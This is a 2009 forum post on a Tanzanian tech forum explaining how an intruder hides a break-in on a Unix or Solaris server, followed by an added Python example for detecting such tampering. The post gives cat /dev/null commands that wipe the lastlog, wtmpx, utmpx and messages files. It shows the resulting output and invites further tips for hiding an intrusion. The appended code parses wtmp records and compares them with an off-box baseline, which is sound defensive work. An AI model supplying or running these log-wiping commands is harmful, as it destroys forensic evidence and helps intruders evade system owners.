How to Cover Your Tracks After Haxing A UNIX Box | JamiiForums | The Home of Great Thinkers



Discussion in 'Tech, Gadgets & Science Forum' started by SnEafer, Apr 2, 2009.

    I read this article posted by anton ***I think*** and somehow he mentioned a few tricks to know when someone has haxed your system.

    Well, he did say a few tricks a haxer could use, but I think he wasn't aware of the tricks that I'll show below:

    Here are some ways of covering your fingerprints on a server using the files that monitor user logins ***in Linux/Unix***.
    We want to erase any trace that will show that we were inside the box. In doing so we’ll just:
    cat /dev/null > <file>
    Lastlog file
    Clear out the lastlog file if you're using an existing user from the box. The lastlog file shows when and from where a particular user last logged in.
    login: razile
    Last login: Fri Oct 21 21:50:02 2007 from
    Sun Microsystems Inc. SunOS 5.9 Generic May 2002
    razile@unix-box %
    Erase that if you don't want the admin to see where you last logged in from (IP, hostname, time, etc.).
    cat /dev/null > /var/adm/lastlog   # Solaris path; on Linux the file is /var/log/lastlog
    After clearing the lastlog file, compare the first login and the second one:
    (first login)
    Last login: Thu Nov 1 21:33:41 2007 from
    Sun Microsystems Inc. SunOS 5.9 Generic May 2002
    (after deletion)
    Sun Microsystems Inc. SunOS 5.9 Generic May 2002
    bash: unalias: `e': not an alias
    wtmpx/utmpx files
    If you want to check which users have logged in to a Unix box, type 'last':
    UnixBox# last | more
    root pts/21 Sat Nov 3 11:38 still logged in
    sitescp pts/20 Sat Nov 3 07:00 still logged in
    root pts/23 Sat Nov 3 05:05 still logged in
    root pts/22 Sat Nov 3 05:05 still logged in
    paladel pts/22 Fri Nov 2 14:33 - 15:32 (00:59)
    boy1 pts/26 Fri Nov 2 13:22 - 14:50 (01:28)
    boy2 pts/26 Fri Nov 2 13:20 - 13:22 (00:02)
    You'll see the user who was logged in, the terminal used, the IP he came from, and the date and duration of his activity on the server.
    That is a lot of information, so to cover your tracks, delete or zero out the files that store it:
    cat /dev/null > /var/adm/wtmpx   # login/logout history read by 'last'
    cat /dev/null > /var/adm/utmpx   # currently logged-in sessions read by 'who'/'w'
    After doing so, you'll get this when running 'last':
    # cat /dev/null > /var/adm/wtmpx
    # last | more
    wtmp begins Sun Nov 4 00:41
    You could also zero out /var/adm/messages if you're really paranoid.
    Of course, doing this is like shouting and telling the whole universe that you were there.
    These are just a few ways to cover your tracks… Do you have any additions? Or any tips on covering an intrusion without anyone knowing that you were there?

    For admins:

    Making a copy of every connection on a CD (burning it) makes it very hard for a haxer to tamper with that data.

    But remember not all admins do that ;-)
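The post's admin tip (keep a copy of the login records somewhere the intruder cannot reach) is the detection side of the `cat /dev/null > wtmpx` trick: a wtmp-style file is append-only by construction, so any copy taken earlier must still be a byte-for-byte prefix of the live file. The following is an added example, not code from the original post or from any tool it names. It builds a few Linux glibc `struct utmp` records (384 bytes each; this is an assumption about the platform, the Solaris `wtmpx` layout shown in the post is a different struct), parses them the way `last` would, and checks the live file against an off-box baseline. The hostnames, users and timestamps are constructed sample data.

```python
"""Append-only check for a wtmp-style login log.

Added example, not from the original post. Constructs Linux glibc
``struct utmp`` records (384 bytes each; Solaris utmpx differs), parses
them like ``last`` does, and compares the live file against an off-box
baseline copy (the post's "burn it to CD" idea). A genuine wtmp only ever
grows, so a live file that is empty, shorter than the baseline, or that
differs from the baseline in its leading bytes has been zeroed or edited.
"""
import struct

# glibc struct utmp on x86_64/i386, little-endian, no native alignment:
# ut_type, pad, ut_pid, ut_line[32], ut_id[4], ut_user[32], ut_host[256],
# exit_status (2 shorts), ut_session, ut_tv (sec, usec), ut_addr_v6[4], pad[20]
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)  # 384
USER_PROCESS, DEAD_PROCESS = 7, 8


def pack_record(ut_type, pid, line, user, host, tv_sec):
    """Build one utmp record; used here only to construct sample data."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"",
                       user.encode(), host.encode(), 0, 0, 0, tv_sec, 0,
                       0, 0, 0, 0)


def _cstr(b):
    """Decode a NUL-padded fixed-width C string field."""
    return b.split(b"\0", 1)[0].decode("ascii", "replace")


def parse_wtmp(data):
    """Return a list of dicts, one per complete record, oldest first."""
    recs = []
    for off in range(0, len(data) - len(data) % UTMP_SIZE, UTMP_SIZE):
        f = struct.unpack_from(UTMP_FMT, data, off)
        recs.append({"type": f[0], "pid": f[1], "line": _cstr(f[2]),
                     "user": _cstr(f[4]), "host": _cstr(f[5]), "time": f[9]})
    return recs


def logins_by_user(data):
    """Count USER_PROCESS (login) records per user, a summary of `last`."""
    counts = {}
    for r in parse_wtmp(data):
        if r["type"] == USER_PROCESS:
            counts[r["user"]] = counts.get(r["user"], 0) + 1
    return counts


def check_against_baseline(live, baseline):
    """Compare live wtmp bytes with an earlier off-box copy.

    Returns a list of findings; an empty list means the live file still
    contains the baseline unchanged and has only grown since it was taken.
    """
    if not live:
        return ["wtmp is empty: zeroed (cat /dev/null > wtmp) or just rotated"]
    if len(live) < len(baseline):
        return [f"wtmp shrank from {len(baseline)} to {len(live)} bytes: truncated"]
    if live[:len(baseline)] != baseline:
        return ["wtmp no longer starts with the baseline bytes: records edited in place"]
    return []


if __name__ == "__main__":
    t0 = 1193924400  # constructed timestamp (1 Nov 2007) to match the post's era
    # Constructed baseline: the copy an admin burned to CD earlier.
    baseline = b"".join([
        pack_record(USER_PROCESS, 1201, "pts/22", "paladel", "10.0.0.5", t0),
        pack_record(DEAD_PROCESS, 1201, "pts/22", "", "", t0 + 3540),
        pack_record(USER_PROCESS, 1300, "pts/21", "root", "10.0.0.9", t0 + 7200),
    ])
    # Honest growth: one more login appended since the baseline was taken.
    live_ok = baseline + pack_record(USER_PROCESS, 1400, "pts/20", "sitescp",
                                     "10.0.0.7", t0 + 9000)
    # What `cat /dev/null > /var/adm/wtmpx` leaves behind.
    live_zeroed = b""
    # A quieter edit: the root login removed, everything else kept.
    live_edited = baseline[:2 * UTMP_SIZE] + live_ok[len(baseline):]
    for name, data in [("intact", live_ok), ("zeroed", live_zeroed),
                       ("edited", live_edited)]:
        print(name, logins_by_user(data), check_against_baseline(data, baseline))
```

The prefix comparison is the whole check: it needs no parsing at all, and the parser is only there to show what the zeroed file no longer tells you. It is only as strong as the baseline's independence from the box, which is exactly why the post suggests write-once media; a baseline stored on the same host can be zeroed with the same one-liner. On a real system the baseline would be a copy of `/var/log/wtmp` (Linux) or `/var/adm/wtmpx` (Solaris) taken before the incident, and the same comparison applies to `lastlog`.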